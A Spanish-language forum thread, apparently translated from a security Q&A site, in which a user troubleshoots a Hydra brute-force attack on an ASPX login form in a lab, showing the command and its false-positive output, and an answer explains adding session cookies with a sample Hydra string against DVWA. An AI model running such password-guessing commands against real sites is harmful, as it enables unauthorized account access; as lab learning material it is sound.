cómo obtener cookies del sitio aspx para usarlas con la hidra

4

He estado jugando con el sitio de Hydra y .aspx y he tenido algunos inconvenientes: Hydra responde y me dice que las primeras 16 contraseñas de mi lista de contraseñas son correctas cuando ninguna de ellas lo es. p>

Sintaxis:

hydra 192.168.88.196 -l admin -P /root/lower http-post-form "/mmm/index.aspx:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect."

Salida

Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2015-05-05 22:30:51

[DATA] 16 tasks, 1 server, 815 login tries (l:1/p:815), ~50 tries per task

[DATA] attacking service http-get-form on port 80

[80][www-form] host: 192.168.88.196   login: admin   password: adrianna

[STATUS] attack finished for 192.168.88.196 (waiting for children to finish)

[80][www-form] host: 192.168.88.196   login: admin   password: adrian

[80][www-form] host: 192.168.88.196   login: admin   password: aerobics

[80][www-form] host: 192.168.88.196   login: admin   password: academic

[80][www-form] host: 192.168.88.196   login: admin   password: access

[80][www-form] host: 192.168.88.196   login: admin   password: abc

[80][www-form] host: 192.168.88.196   login: admin   password: admin

[80][www-form] host: 192.168.88.196   login: admin   password: academia

[80][www-form] host: 192.168.88.196   login: admin   password: albatross

[80][www-form] host: 192.168.88.196   login: admin   password: alex

[80][www-form] host: 192.168.88.196   login: admin   password: airplane

[80][www-form] host: 192.168.88.196   login: admin   password: albany

[80][www-form] host: 192.168.88.196   login: admin   password: ada

[80][www-form] host: 192.168.88.196   login: admin   password: aaa

[80][www-form] host: 192.168.88.196   login: admin   password: albert

[80][www-form] host: 192.168.88.196   login: admin   password: alexander

1 of 1 target successfuly completed, 16 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-05-05 22:30:51

He leído que podemos agregar cookies a Hydra ok: "H=Cookie: security;low;PHPSESSID=<value for PHP SESSID cookie"

  1. ¿Cómo obtiene las cookies de aspx?
  2. ¿Cómo se lo proporcionas a la hidra?
pregunta user3306821 17.05.2015 - 12:09
fuente

1 respuesta

4

Use un complemento del navegador como Cookies Manager Plus en Firefox luego, simplemente puede copiar el valor en el portapapeles.

Como usted dice, simplemente pegue el valor en la línea de comando para Hydra.

Vea mi respuesta aquí para conocer la sintaxis que funcionó para mí.

"/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=incorrect:H=Cookie: PHPSESSID=07b7ebb2faea96f8471ecdb759e68108; security=low"

Entonces, en lugar de PHPSESSID y el valor, incluya el nombre y el valor de la sesión de ASP.NET.

    
respondido por el SilverlightFox 17.05.2015 - 19:38
fuente